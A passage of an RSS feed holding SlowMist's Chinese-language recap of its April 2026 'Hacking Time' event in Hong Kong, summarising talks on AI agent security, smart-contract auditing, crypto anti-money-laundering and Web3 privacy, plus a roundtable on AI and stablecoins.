0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=31bfe27d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504841%26idx%3D1%26sn%3D289fc7c20f2f00f8313ea5a5c378f90f">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 27 Apr 2026 16:25:00 +0800</pubDate>
    </item>
    <item>
      <title>Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8</link>
      <description>慢雾(SlowMist) 衷心感谢所有亲临现场的嘉宾与参与者的支持!</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-04-23 14:56</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=98f9aa80&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCIQmhFvN9ia5xqO1XTedU2266845F6ficWLYNPGia9syjKhov88K6uPm71YVibVlWxG0YfFMfddwsic8IuAJPkHahNY7WRYPoYCUvdE%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>慢雾(SlowMist) 衷心感谢所有亲临现场的嘉宾与参与者的支持!</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 21 日下午，由慢雾(SlowMist) 主办的 Hacking Time 在香港蔡氏大厦成功举办。活动紧随香港 Web3 嘉年华热潮，以「Security for AI &amp; Crypto, AI for Security」为主题，吸引了全球的安全研究员、开发者、行业专家及 Web3 从业者齐聚一堂。现场座无虚席，气氛热烈，观众在聆听与交流中持续切换，展现出业界对 AI 与 Web3 融合安全议题的高度关注。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021097" data-ratio="0.75" width="544" data-type="jpeg" data-w="1080" height="407" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e4a1517d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLzkG9375LzG0V0xibDpyTr4DrhLxPp20QFrAoWdSZ9ZJPpfNX1iaszJG1QnxXw5gBLcicz3FrCblEZmml6G57WYgCb1sJRmUVhJY%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">Hacking Time 现场回顾</span></span></h1></b></p><p><b data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动在慢雾(SlowMist) 合伙人 &amp;  CISO 23pds 的主持下正式开启。他首先对到场嘉宾与观众表示欢迎，并简要介绍了本次 Hacking Time 的主题与议程，为整场活动奠定了“技术驱动 + 实战导向”的基调。</span></span></h1><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7898148148148149" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021106" src="https://wechat2rss.xlab.app/img-proxy/?k=a7a7faae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJrqfldjOcfUyZgaRREOaqXJSTiaGwCNZ68TVuYTkWZ4aKP2Fvy1uZBXEXia1gDnFalJlO7x7tChufSibIeAEZrBibAdHdz0R7Dvsg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">随后，慢雾(SlowMist) 创始人 Cos 带来开场演讲，围绕「慢雾 AI 安全实践」展开分享。他指出，AI 安全威胁已从“未来风险”演变为“现实问题”：一方面，攻击者正借助 AI 显著提升作恶能力，例如音视频伪造门槛降低、漏洞挖掘效率提升；另一方面，项目方在引入 AI 的过程中，也可能因模型幻觉、第三方模型服务等问题引入新的安全隐患。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在此基础上，Cos 强调，随着 AI Agent 的发展，“文本即指令”正在成为新的安全边界，提示词本身可能成为攻击载体，带来全新的攻击面与防御挑战。</span><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">在实践层面，他介绍了慢雾从社区驱动走向产品化落地的路径，以及以 MistAgent 为核心，结合 MistEye、MistTrack 等能力构建的 AI 安全体系，并指出在 AI 与 Web3 深度融合的趋势下，安全竞争的本质仍在于人——要么驾驭机器，要么被机器所塑造。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021107" src="https://wechat2rss.xlab.app/img-proxy/?k=9ad5fbb8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLibj8pPLibrW5wTLjJlLKNhGuSicQlswXlKjoRphowdnIeK2tHRIsalgtQcIGfvFKf6iceGsiaHqR94tnEg7vwQKJYl1ObECWU0MGc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在接下来的主题分享环节中，多位来自慢雾及行业的技术专家，从不同维度对 AI 与 Web3 安全的关键问题进行</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">了深入拆解：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾(SlowMist) 业务安全负责人 Thinking 以「从攻防到基建：构建 AI 驱动的威胁情报安全闭环」为题，深入剖析了 AI 时代下攻击者利用自动化工具与社工手段带来的“攻防不对称”危机。</span></span><span data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">他结合供应链投毒、AI Agent Skills 市场中的恶意插件，以及 Bybit 被盗案等真实案例，阐述了 SlowMist 如何将八年一线攻防经验，逐步转化为可扩展的安全基础设施。</span></span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">演讲重点展示了包含 MistEye（威胁感知）、MistAgent（深度分析大脑）及 MistTrack（链上风控）在内的五层纵深防御体系，强调通过“专家能力 × AI”的产品化策略，为 Web3 与 AI 生态构建自适应的数字免疫系统。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021108" src="https://wechat2rss.xlab.app/img-proxy/?k=c1facc71&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCLz3NJriaibINMbnX1VRkK18Dz1lNu2VTQZknuX8RA0bEMJ1alibjU1IicZVHlJ7icrbW96MuxakLELkGHwsiasrEIgdgEleB2liaL3ibA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾(SlowMist) 合约安全审计负责人 Kong 则围绕「AI 驱动的 Web3 安全攻防实践」展开，探讨了 AI 在智能合约审计与链上攻击分析中的应用与边界。他指出当前 AI 审计面临上下文限制与结论可信度不足等问题，并分享了基于 AST 解析、RAG 历史案例检索、多模型并行审计及 LLM-as-Judge 的四层架构，用以提升审计结果的可靠性。同时，他提出通过“认知状态架构”优化链上攻击分析流程，以缓解注意力稀释问题，实现更精准的攻击路径还原与根因定位。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.75" data-type="jpeg" data-w="1080" height="451" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021098" src="https://wechat2rss.xlab.app/img-proxy/?k=a4e0e19f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCIXDzHO2swYQxTVNCQdtpaVyL4nqU8Y4ng4RES6l9L4D14a1L6I30JzAMdf9hXvwjrUXqnFwStXAJRXvLxcZja8bfuN77zUXEc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾合伙人 &amp;  CPO Keywolf 以「AI 时代下的加密货币反洗钱挑战与应对建议」为题，深入剖析了 AI 技术迭代与地缘政治博弈下，加密资产反洗钱面临的严峻形势。</span></span><span data-spm-anchor-id="5176.28103460.0.i15.5a2e2988HY8Rro" data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在技术层面，Keywolf 重点分享了慢雾 AML 体系的两大核心能力：</span></span></span><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一是对链上实体</span></span></strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">（如交易所、智能合约），通过“开户 KYC-充值交互-提币探测-自动化监测”四步法，结合 Nonce 推导与 CREATE2 预计算等技术，实现精准识别与动态更新；</span></span><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">二是构建全球化的黑地址情报网络</span></span></strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，依托公开数据与高壁垒的非公开情报（如司法协作、行业联盟），持续追踪和标记恶意地址。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.75" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021109" src="https://wechat2rss.xlab.app/img-proxy/?k=a8d747a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCK1ibemibEGic9uZZh26C0p2JoxMwK5ynwQiac1xVSaxcLX1Zu3YHyzggJw2cWEa2MVgIHlx8BvttV3C6wE3U1K4bM41RzxJibibZ77E%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在行业视角分享环节，嘉宾们同样带来了多元化的洞察：</span></span></p><span leaf="" style="text-indent: 0px;line-height: 25.6px;text-align: left;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全分享嘉宾 SEEM 以「Claude Code 源码里的工程真相及安全应用」为题，深度拆解了 AI 智能体的底层架构。他提出“上下文工程”理念，主张利用工具赋予智能体自主探索能力，并结合 Harness 机制解决长时任务的上下文污染难题。同时，他剖析了以“边界为中心”的安全防御模型，强调通过沙箱隔离与权限门控限制爆炸半径，揭示了智能体能力实则是模型与工程约束深度协同的产物。</span></span><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.75" data-type="jpeg" data-w="1080" height="382" style="margin-left: 0px;margin-top: 0px;" width="511" data-imgfileid="100021102" src="https://wechat2rss.xlab.app/img-proxy/?k=60e00f54&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCJ50Ep3uBpD2HFZp208k9nTYNtB8jc7Ulbkw6H5wWOEHwt1pHAz3Mpta5Ev2CCeQgqHlBG2iaZtlv6LDq0MoSPVyv40W6yn8H7c%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RC² TSCM 实验室创始人 Chris Yang 以「浅谈 Web3 从业者的隐私保护」为题，基于其 </span></span></span><strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RC² 商业秘密 &amp; 隐私保护服务</span></span></strong><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">的专业实践，揭示了全球 Web3 从业者面临的“扳手攻击”等物理胁迫风险。他结合 2024 至 2025 年间的恶性案件，指出情报泄露是核心威胁，并强调传统安保难以应对数字财富隐匿需求。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7490740740740741" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021110" src="https://wechat2rss.xlab.app/img-proxy/?k=7b8516dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKozLY432IFJzldz6lvKNjNsg1lgswg3Y5bExOVlClV07VS6zfpFrFiaialKexjEJd6ua0IXUJEpAdmRSOJfksibBOOUribmHUGxlw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动后半程，一场高质量的圆桌讨论将现场氛围推向高潮。圆桌以「香港 Web3 发展：AI 和稳定币谁将成为未来关键驱动力」为主题，由慢雾(SlowMist) 香港社区负责人 Tony Tan 主持。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">来自不同领域的嘉宾——RigSec CTO Neilson Lei、FinTax 创始人&amp; CEO Calix、君合律师事务所合伙人 Jacqueline Qiao，以及慢雾(SlowMist) 合伙人 &amp;  CPO Keywolf——从技术、合规、产业与金融等多个视角展开讨论。围绕 AI 与稳定币在未来 Web3 生态中的角色，嘉宾们普遍认为，二者并非此消彼长的关系，而是相互促进的关键基础设施：AI 可为稳定币提供风控与运营支持，而稳定币则为 AI 经济体系提供价值锚定与支付通道。在此基础上，嘉宾们进一步探讨了香港在全球 Web3 版图中的发展路径，认为若能把握 AI 与稳定币融合机遇，香港有望在新一轮 Web3 产业竞争中占据更具优势的位置。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.562962962962963" data-type="jpeg" data-w="1080" height="339" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021101" src="https://wechat2rss.xlab.app/img-proxy/?k=c5f5c065&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCIicCxJbHDqIQFzMSRMUjfJIg46QPKjR81oSliaNThZItqWPERJMYPdqhYVG812ZbVxPqS5xr0MjtccmbeuVqiaicAdMMPKicOStmiag%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动现场始终保持高密度交流与高度专注的氛围。在分享与讨论间隙，嘉宾与观众围绕 AI 安全、链上攻防及合规实践展开持续交流，互动频繁。无论是台上的技术拆解，还是台下的即时讨论，都反映出行业对“AI × Web3 安全”议题的高度关注，也使本次 Hacking Time 成为本届香港 Web3 嘉年华期间最具技术深度的安全主题活动之一。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.7490740740740741" data-s="300,640" data-type="jpeg" data-w="1080" type="block" data-imgfileid="100021111" src="https://wechat2rss.xlab.app/img-proxy/?k=1c4ed12f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJcfseECrJzblsia0dcCX31Hm1Km31u75I8r6dLeEibQHU6ULXlpqCT9Zsoayn2SIf7osWsJeTeQGXQkhiauJBJweGF7twnS2opLw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p data-start="443" data-end="529" data-pm-slice="0 0 []" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，在 Hacking Time 结束后的“慢雾夜谈”交流环节中，来自安全研究、链上分析、合规与基础设施等领域的 30 余位行业从业者围绕 AI × Web3 安全议题展开深入交流。参与者在轻松开放的氛围中通过自我介绍与经验分享加深彼此认知与连接，并围绕威胁情报共享、攻击检测协同与安全能力互补等方向进行探讨，进一步促进跨团队与跨机构之间的理解与协同，为未来在链上安全防护与生态安全建设领域建立更紧密的合作关系奠定基础。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">写在最后</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次 Hacking Time 不仅延续了其一贯的技术深度与专业水准，也在 AI 与 Web3 融合的背景下，清晰呈现了安全体系从“攻防实践”向“基础设施化”的演进路径。从智能合约审计到链上攻击分析，从威胁情报到合规治理，多个维度的分享共同指向一个核心趋势：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全正在成为 AI × Web3 时代最关键的底层能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, 